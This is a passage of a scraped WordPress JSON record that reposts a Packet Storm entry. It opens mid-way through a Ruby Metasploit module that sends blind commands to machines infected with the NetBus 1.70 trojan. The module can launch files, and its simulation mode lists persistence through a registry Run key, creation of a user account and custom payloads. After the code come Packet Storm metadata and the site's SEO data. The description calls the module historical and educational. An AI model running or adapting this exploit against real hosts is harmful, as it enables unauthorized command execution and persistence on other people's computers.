execute_file_payload(filepath)\\n        print_status(\\&#8221;Executing file: #{filepath}\\&#8221;)\\n    \\n        cmd = \\&#8221;StartApp;start \\\\\\&#8221;\\\\\\&#8221; \\\\\\&#8221;#{filepath}\\\\\\&#8221;\\\\r\\\\n\\&#8221;\\n        execute_blind_command(cmd, \\&#8221;File execution\\&#8221;)\\n      end\\n    \\n      def execute_blind_command(cmd, description = \\&#8221;Command\\&#8221;)\\n        begin\\n          print_status(\\&#8221;Executing: #{description}\\&#8221;)\\n          sock.put(cmd)\\n          Rex.sleep(datastore[&#8216;CMD_DELAY&#8217;])\\n    \\n          if sock \\u0026\\u0026 !sock.closed?\\n            print_good(\\&#8221;Command sent (assumed executed)\\&#8221;)\\n            return true\\n          else\\n            print_error(\\&#8221;Connection lost\\&#8221;)\\n            return false\\n          end\\n        rescue ::Exception =\\u003e e\\n          print_error(\\&#8221;Execution failed: #{e.message}\\&#8221;)\\n          return false\\n        end\\n      end\\n    \\n      def reconnect_if_needed\\n        unless sock \\u0026\\u0026 !sock.closed?\\n          print_status(\\&#8221;Attempting to reconnect&#8230;\\&#8221;)\\n          connect_to_netbus\\n        end\\n      end\\n    \\n      def simulate_exploit\\n        print_status(\\&#8221;=== SIMULATION MODE ===\\&#8221;)\\n        print_status(\\&#8221;The following commands WOULD be executed:\\&#8221;)\\n    \\n        case datastore[&#8216;ACTION&#8217;]\\n        when &#8216;test&#8217;\\n          print_status(\\&#8221;1. StartApp;calc.exe\\&#8221;)\\n          print_status(\\&#8221;2. StartApp;notepad.exe\\&#8221;)\\n          print_status(\\&#8221;3. StartApp;cmd.exe \/c echo test \\u003e nul\\&#8221;)\\n        when &#8216;execute&#8217;\\n          print_status(\\&#8221;Command: #{datastore[&#8216;CMD&#8217;]}\\&#8221;)\\n        when &#8216;persist&#8217;\\n          print_status(\\&#8221;1. Copy file to %TEMP%\\&#8221;)\\n          print_status(\\&#8221;2. Add registry Run key\\&#8221;)\\n          if datastore[&#8216;CREATE_USER&#8217;]\\n            print_status(\\&#8221;3. Create user: #{datastore[&#8216;USERNAME&#8217;]}\\&#8221;)\\n          end\\n        when &#8216;remove&#8217;\\n          print_status(\\&#8221;Various NetBus removal commands\\&#8221;)\\n        when &#8216;custom&#8217;\\n          print_status(\\&#8221;Custom payload: #{datastore[&#8216;CUSTOM_PAYLOAD&#8217;]}\\&#8221;)\\n        end\\n    \\n        print_status(\\&#8221;Simulation completed &#8211; no actual commands were sent\\&#8221;)\\n      end\\n    \\n      def cleanup\\n        print_status(\\&#8221;Cleaning up&#8230;\\&#8221;) if datastore[&#8216;VERBOSE&#8217;]\\n    \\n        begin\\n          disconnect if sock \\u0026\\u0026 !sock.closed?\\n        rescue ::Exception\\n          # Ignore cleanup errors\\n        end\\n    \\n        super\\n      end\\n    end\\n    \\n    Greetings to\\n    :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln\\n    (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213311&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213311\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:59&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides historical\/educational exploitation of the Backdoor.Win32.Netbus.170 trojan, originally discovered in 1998. It represents a legacy proof-of-concept rather than a modern offensive security&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32937","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32937\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:59&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides historical\/educational exploitation of the Backdoor.Win32.Netbus.170 trojan, originally discovered in 1998. It represents a legacy proof-of-concept rather than a modern offensive security...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32937\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-26T11:45:40+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311\",\"datePublished\":\"2025-12-26T11:45:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937\"},\"wordCount\":3582,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32937#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937\",\"name\":\"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-26T11:45:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32937\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32937#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32937","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:59&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides historical\/educational exploitation of the Backdoor.Win32.Netbus.170 trojan, originally discovered in 1998. It represents a legacy proof-of-concept rather than a modern offensive security...","og_url":"https:\/\/zero.redgem.net\/?p=32937","og_site_name":"zero redgem","article_published_time":"2025-12-26T11:45:40+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32937#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32937"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311","datePublished":"2025-12-26T11:45:40+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32937"},"wordCount":3582,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32937#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32937","url":"https:\/\/zero.redgem.net\/?p=32937","name":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-26T11:45:40+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32937#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32937"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32937#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Backdoor.Win32.Netbus.170 Blind Command Execution_PACKETSTORM:213311"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32937","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32937"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32937\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32937"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32937"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32937"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}